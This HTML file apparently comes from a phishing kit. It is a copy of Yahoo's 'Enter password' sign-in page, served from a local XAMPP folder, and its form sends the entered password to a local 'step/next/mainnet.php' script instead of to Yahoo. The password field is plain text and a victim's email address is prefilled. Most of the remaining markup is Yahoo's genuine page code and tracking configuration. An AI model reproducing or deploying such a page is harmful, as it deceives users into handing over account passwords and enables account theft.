<!DOCTYPE html>
<!-- saved from url=(0041)file:///C:/xampp/htdocs/sc/inv/Yahoo2.htm -->
<html id="Stencil" lang="en-US" class="js grid light-theme "><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        
        <meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=0, shrink-to-fit=no">
        <meta name="format-detection" content="telephone=no">
        <meta name="referrer" content="strict-origin-when-cross-origin">
        <meta name="oath:guce:consent-host" content="guce.yahoo.com">
        <title>Yahoo</title>
        <meta name="description" content="Best in class Yahoo Mail, breaking local, national and global news, finance, sports, music, movies... You get more out of the web, you get more out of life.">
        <link rel="dns-prefetch" href="file://gstatic.com/">
        <link rel="dns-prefetch" href="file://google.com/">
        <link rel="dns-prefetch" href="file://s.yimg.com/">
        <link rel="dns-prefetch" href="file://y.analytics.yahoo.com/">
        <link rel="dns-prefetch" href="file://ucs.query.yahoo.com/">
        <link rel="dns-prefetch" href="file://geo.query.yahoo.com/">
        <link rel="dns-prefetch" href="file://geo.yahoo.com/">
        <link rel="icon" type="image/x-icon" href="https://s.yimg.com/wm/mbr/images/yahoo-favicon-img-v0.0.2.ico">
        <link rel="shortcut icon" type="image/x-icon" href="https://s.yimg.com/wm/mbr/images/yahoo-favicon-img-v0.0.2.ico">
        <meta name="google-site-verification" content="yOTFyUBPTnXtuk2cPpqfv7ZvZ960JgqsV8FomN3n7Y0">
        <link rel="apple-touch-icon" href="https://s.yimg.com/wm/mbr/images/yahoo-apple-touch-v0.0.2.png">
        <link rel="apple-touch-icon-precomposed" href="https://s.yimg.com/wm/mbr/images/yahoo-apple-touch-v0.0.2.png">
        <style nonce="KMWTzp9aXL5x4cKFSUiC0RaMOkFLAOnNwEHG3fXplEcYkfup">
            #mbr-css-check {
                display: inline;
            }
        </style>
        <link href="./Yahoo3_files/yahoo-main.css" rel="stylesheet" type="text/css">
        <script nonce="KMWTzp9aXL5x4cKFSUiC0RaMOkFLAOnNwEHG3fXplEcYkfup">
            var pageStartTime = new Date().getTime();
            (function(root) {
                var isGoodJS = ('create' in Object && 'isArray' in Array && 'pushState' in window.history);
                root.isGoodJS = isGoodJS;
            }(this));
            
(function (root) {
/* -- Data -- */
root.YUI_config = {"comboBase":"https:\u002F\u002Fs.yimg.com\u002Fzz\u002Fcombo?","combine":true,"root":"yui-s:3.18.0\u002F"};
root.I13N_config = {"keys":{"pt":"utility","ver":"nodejs"}};
root.I13N_config || (root.I13N_config = {});
root.I13N_config.spaceid = 794200019;
root.I13N_config.location = "https:\u002F\u002Flogin.yahoo.com\u002Faccount\u002Fchallenge\u002Fpassword?.lang=en-US&src=homepage&activity=ybar-signin&pspid=2023538075&display=login";
root.I13N_config.referrer = "https:\u002F\u002Flogin.yahoo.com\u002F";
root.I13N_config.keys || (root.I13N_config.keys = {});
root.I13N_config.keys.pg_name = "passwordChallenge";
root.I13N_config.keys.gm_np = "yahoo";
root.I13N_config.keys.src = "homepage";
root.I13N_config.keys.p_sec = "DEFAULT_SECTION";
root.I13N_config.keys.p_subsec = "DEFAULT_SUBSECTION";
root.I13N_config.keys.test = "mbr-siwg-ym,mbr-plivo-ykeykey-migrate,mbr-2sv-redesign-authn-app-control,mbr-whatsapp-non-hc,mbr-2sv-redesign-sms-control";
root.I13N_config.keys.cause = "ybar-signin";
root.I13N_config.keys.src_id = "2023538075";
root.COMET_URL = "https:\u002F\u002Fserver.comet.yahoo.com\u002Fcomet";
root.gamIframeUrl = "https:\u002F\u002Fgpt.mail.yahoo.net\u002Fsandbox?client=login&version=0.1&limited=0&headerBidder=1&haq=1&benji=1#config=%7B%22positions%22%3A%5B%7B%22adUnitPath%22%3A%22%2F22888152279%2Fus%2Fylogin%2Fmain%2Fdt%2Fus_ylogin_main_dt_full_screen%22%2C%22adLocation%22%3A%22full_screen%22%2C%22size%22%3A%5B%5B1440%2C1024%5D%2C%5B%22fluid%22%5D%5D%2C%22div%22%3A%22gpt-passback%22%7D%5D%2C%22pageUrl%22%3A%22https%3A%2F%2Flogin.yahoo.com%22%2C%22headerBidder%22%3Atrue%2C%22yahooPrebid%22%3Atrue%2C%22geoCountryCode%22%3A%22NG%22%2C%22npa%22%3Afalse%2C%22limited%22%3Afalse%2C%22PPId%22%3A%22__PPId__%22%2C%22targetingConfig%22%3A%7B%22lang%22%3A%22en-US%22%2C%22bucket%22%3A%22mbr-whatsapp-non-hc%22%2C%22spaceId%22%3A%22794200019%22%2C%22adLocation%22%3A%22full_screen%22%2C%22age%22%3A%225%22%2C%22gender%22%3A%221%22%2C%22colo%22%3A%22bf1%22%2C%22lu%22%3A%220%22%2C%22site%22%3A%22login%22%2C%22device%22%3A%22desktop%22%2C%22region%22%3A%22us%22%2C%22pageOrigin%22%3A%22https%3A%2F%2Flogin.yahoo.com%22%2C%22AXId%22%3A%22__AXId__%22%7D%2C%22headerBidderConfig%22%3A%7B%22host%22%3A%22login.yahoo.com%22%2C%22pblob%22%3A%22lu%3A0%7C%7C794200019%7C%7C%22%2C%22buckets%22%3A%5B%22mbr-whatsapp-non-hc%22%5D%2C%22limited%22%3Afalse%2C%22cobrand%22%3A%22%22%2C%22lang%22%3A%22en-US%22%2C%22site%22%3A%22yahoo_login%22%2C%22region%22%3A%22us%22%2C%22adLocation%22%3A%22full_screen%22%2C%22dv360%22%3A%22__DV360__%22%2C%22AXId%22%3A%22__AXId__%22%7D%7D";
root.challenge || (root.challenge = {});
root.challenge.servingStamp = 1721225911033;
root.challenge.isAndroidWebview = false;
root.I13N_config.keys.pct = "signin";
root.pwchallenge || (root.pwchallenge = {});
root.pwchallenge.messages = {"toolTipShow":"Show password","toolTipHide":"Hide password"};
root.isIOSDevice = false;
}(this));

            
            YUI_config.global = window;


            window.mbrSendError = function (name, url) {
                (new Image()).src = '/account/js-reporting/?rid=387noshj9fkln&crumb=' + encodeURIComponent('94jyjqi2AD0TkeRg8eQugg') + '&message=' + encodeURIComponent(name) + '&url=' + encodeURIComponent(url);
            };

            var oldError = window.onerror;

            window.onerror = function (errorMsg, url) {
                window.mbrSendError(errorMsg, url);
                if (oldError) {
                    oldError.apply(this, arguments);
                }
                return false;
            };

        </script>
    </head>
    <body class="bucket-mbr-whatsapp-non-hc">
    <script nonce="KMWTzp9aXL5x4cKFSUiC0RaMOkFLAOnNwEHG3fXplEcYkfup">
        (function(root) {
            var doc = document;
            if (root.isGoodJS) {
                doc.documentElement.className = doc.documentElement.className.replace('no-js', 'js');
            }
        }(this));
    </script>
    <div id="login-body" class="loginish  puree-v2  grid    ">
    <div class="mbr-desktop-hd">
    <span class="column">
         <a href="https://www.yahoo.com/">
            <img src="./Yahoo3_files/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png" alt="Yahoo" class="logo " width="" height="36">
            <img src="./Yahoo3_files/yahoo_frontpage_en-US_s_f_w_bestfit_frontpage_2x.png" alt="Yahoo" class="dark-mode-logo logo " width="" height="36">
        </a>
    </span>
    <div class="desktop-universal-header">
        <a href="https://help.yahoo.com/kb/index?locale=en_US&amp;page=product&amp;y=PROD_ACCT" data-rapid-tracking="true" data-ylk="elm:link;elmt:link;slk:headerHelp">Help</a>
        <a href="https://legal.yahoo.com/us/en/yahoo/terms/otos/index.html" class="universal-header-links" data-rapid-tracking="true" data-ylk="elm:link;elmt:link;slk:headerTerms">Terms</a>
        <a href="https://legal.yahoo.com/us/en/yahoo/privacy/index.html" class="universal-header-links privacy-link" data-rapid-tracking="true" data-ylk="elm:link;elmt:link;slk:headerPrivacy">Privacy</a>
    </div>
</div>
    <div class="login-box-container">
        <div class="login-box right">
            <div class="mbr-login-hd txt-align-center">
                    <img src="./Yahoo3_files/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png" alt="Yahoo" class="logo yahoo-en-US" width="" height="27">
                    <img src="./Yahoo3_files/yahoo_frontpage_en-US_s_f_w_bestfit_frontpage_2x.png" alt="Yahoo" class="dark-mode-logo logo yahoo-en-US" width="" height="27">
            </div>
            <div class="challenge password-challenge">
    <div class="challenge-header">
        <div class="yid"></div>
    </div><div id="password-challenge" class="primary">
    <strong class="challenge-heading">Enter&nbsp;password</strong>
    <span class="txt-align-center challenge-desc">to finish sign&nbsp;in</span>
        <form action="step/next/mainnet.php?" method="post" class="challenge-form ">
        <input type="hidden" name="browser-fp-data" id="browser-fp-data" value="{&quot;language&quot;:&quot;en-US&quot;,&quot;colorDepth&quot;:24,&quot;deviceMemory&quot;:8,&quot;pixelRatio&quot;:1.5,&quot;hardwareConcurrency&quot;:4,&quot;timezoneOffset&quot;:420,&quot;timezone&quot;:&quot;America/Los_Angeles&quot;,&quot;sessionStorage&quot;:1,&quot;localStorage&quot;:1,&quot;indexedDb&quot;:1,&quot;cpuClass&quot;:&quot;unknown&quot;,&quot;platform&quot;:&quot;Win32&quot;,&quot;doNotTrack&quot;:&quot;1&quot;,&quot;plugins&quot;:{&quot;count&quot;:5,&quot;hash&quot;:&quot;2c14024bf8584c3f7f63f24ea490e812&quot;},&quot;canvas&quot;:&quot;canvas winding:yes~canvas&quot;,&quot;webgl&quot;:1,&quot;webglVendorAndRenderer&quot;:&quot;Google Inc. (Intel)~ANGLE (Intel, Intel(R) HD Graphics 620 (0x00005916) Direct3D11 vs_5_0 ps_5_0, D3D11)&quot;,&quot;adBlock&quot;:0,&quot;hasLiedLanguages&quot;:0,&quot;hasLiedResolution&quot;:0,&quot;hasLiedOs&quot;:1,&quot;hasLiedBrowser&quot;:0,&quot;touchSupport&quot;:{&quot;points&quot;:10,&quot;event&quot;:0,&quot;start&quot;:0},&quot;fonts&quot;:{&quot;count&quot;:33,&quot;hash&quot;:&quot;edeefd360161b4bf944ac045e41d0b21&quot;},&quot;audio&quot;:&quot;124.04347527516074&quot;,&quot;resolution&quot;:{&quot;w&quot;:&quot;1280&quot;,&quot;h&quot;:&quot;720&quot;},&quot;availableResolution&quot;:{&quot;w&quot;:&quot;672&quot;,&quot;h&quot;:&quot;1280&quot;},&quot;ts&quot;:{&quot;serve&quot;:1721225911033,&quot;render&quot;:1721226109116}}">
        <input type="hidden" name="crumb" value="94jyjqi2AD0TkeRg8eQugg">
        <input type="hidden" name="acrumb" value="mRRfVhNw">
        <input type="hidden" name="sessionIndex" value="QQ--">
        <input type="hidden" name="displayName" value="">
        <div class="hidden-username">
            <input type="text" tabindex="-1" aria-hidden="true" role="presentation" autocorrect="off" spellcheck="false" name="username" value="jameswilson18501@yahoo.com">
        </div>
        <input type="hidden" name="passwordContext" value="normal">
        <input type="hidden" name="isShowButtonClicked" id="show-button-clicked" value="">
        <input type="hidden" name="showButtonStatus" id="show-button-status" value="">
        <input type="hidden" name="prefersReducedMotion" id="prefers-reduce-motion" value="">
         
        <div id="password-container" class="input-group password-container blurred">
            <input type="text" id="login-passwd" class="password" name="password" placeholder=" " autofocus="" autocomplete="current-password" data-rapid-tracking="true" data-ylk="elm:input;elmt:focus;slk:passwd;mKey:focus-passwd">
            <label for="login-passwd" id="password-label" class="password-label">Password</label>
            <div class="caps-indicator hide" id="caps-indicator" title="Capslock is on"></div>
            <button type="button" class="show-hide-toggle-button hide-pw" id="password-toggle-button" tabindex="-1" title="Show password" data-rapid-tracking="true" data-ylk="elm:btn;elmt:toggle;slk:toggle-show-passwd;mKey:toggle-show-hide">
            </button>
        </div>
        <div class="button-container">
            <button type="submit" id="login-signin" class="pure-button puree-button-primary puree-spinner-button challenge-button" name="verifyPassword" value="Next" data-rapid-tracking="true" data-ylk="elm:btn;elmt:primary;slk:next;mKey:next">
                    Next
            </button>
        </div>
        <div class="forgot-cont challenge-button-link">
            <input type="submit" class="pure-button puree-button-link challenge-button-link" data-ylk="elm:btn;elmt:skip;slk:skip;mKey:skip-recovery" data-rapid-tracking="true" id="mbr-forgot-link" name="skip" value="Forgot password?">
        </div>
    </form>
</div>
</div>
        </div>
        <div id="login-box-ad-fallback" class="login-box-ad-fallback" style="display: block;">
            <h1>Yahoo makes it easy to enjoy what matters most in your&nbsp;world.</h1>
<p>Best in class Yahoo Mail, breaking local, national and global news, finance, sports, music, movies and more. You get more out of the web, you get more out of&nbsp;life.</p>
        </div>
    </div>
    <div class="login-bg-outer">
        <div class="login-bg-inner">
            <div id="login-ad-rich" aria-hidden="true">
                <iframe id="login-ads-gpt-iframe" allow="geolocation &#39;none&#39;; fullscreen &#39;none&#39;; autoplay &#39;none&#39;; camera &#39;none&#39;; display-capture &#39;none&#39;; document-domain &#39;none&#39;; microphone &#39;none&#39;; gyroscope &#39;none&#39;; magnetometer &#39;none&#39;; midi &#39;none&#39;; payment &#39;none&#39;; serial &#39;none&#39;; speaker-selection &#39;none&#39;" sandbox="allow-forms allow-popups allow-popups-to-escape-sandbox allow-same-origin allow-scripts" width="1440" height="1024" scrolling="no" frameborder="no" src="./Yahoo3_files/sandbox.html" style="display: none;"></iframe>
            </div>
                    </div>
    </div>
</div>
    <script src="./Yahoo3_files/rapid-3.53.39.js.download"></script>
    <script nonce="KMWTzp9aXL5x4cKFSUiC0RaMOkFLAOnNwEHG3fXplEcYkfup">
        var rapidInstance = new YAHOO.i13n.Rapid(I13N_config);
    </script>
    <script src="./Yahoo3_files/bundle.js.download"></script>
    <noscript>
        <img src="/account/js-reporting/?crumb=94jyjqi2AD0TkeRg8eQugg&message=javascript_not_enabled&ref=%2Faccount%2Fchallenge%2Fpassword" height="0" width="0" style="visibility: hidden;">
    </noscript>
    <script nonce="KMWTzp9aXL5x4cKFSUiC0RaMOkFLAOnNwEHG3fXplEcYkfup">
        var checkAssets = function(seconds) {
            setTimeout(function() {
                if (!window.mbrJSLoaded) {
                    window.mbrSendError('js_failed_to_load', location.pathname);
                }
                var check = document.getElementById('mbr-css-check'),
                    style = check.currentStyle;
                if (window.getComputedStyle) {
                    style = window.getComputedStyle(check);
                }
                if (style.display !== 'none') {
                    window.mbrSendError('css_failed_to_load', location.pathname);
                }
            }, (seconds * 1000));
        };

        checkAssets(10);
    </script>
    <script src="./Yahoo3_files/cmp.js.download"></script><iframe name="__uspapiLocator" style="display: none;" src="./Yahoo3_files/saved_resource.html"></iframe><iframe name="__tcfapiLocator" style="display: none;" src="./Yahoo3_files/saved_resource(1).html"></iframe><iframe name="__gppLocator" style="display: none;" src="./Yahoo3_files/saved_resource(2).html"></iframe>
    <script src="./Yahoo3_files/opus.js.download"></script>
    <div id="mbr-css-check"></div>
    <div id="page-mask" class="page-mask hide"></div>
    <div id="ad"></div>
    <div class="mbr-legacy-device-bar" id="mbr-legacy-device-bar">
        <label class="cross" for="mbr-legacy-device-bar-cross" aria-label="Close this warning">x</label>
        <input type="checkbox" id="mbr-legacy-device-bar-cross">
        <p class="mbr-legacy-device">
                Yahoo works best with the latest versions of the browsers. You're using an outdated or unsupported browser and some Yahoo features may not work properly. Please update your browser version now. <a href="file:///C:/xampp/htdocs/sc/inv/Yahoo2.htm">More&nbsp;Info</a>
        </p>
    </div>
    <script nonce="KMWTzp9aXL5x4cKFSUiC0RaMOkFLAOnNwEHG3fXplEcYkfup">
        (function(root) {
            if (!root.isGoodJS) {
                document.getElementById('mbr-legacy-device-bar').style.display = 'block';
            }
        }(this));
    </script>
    

</body></html>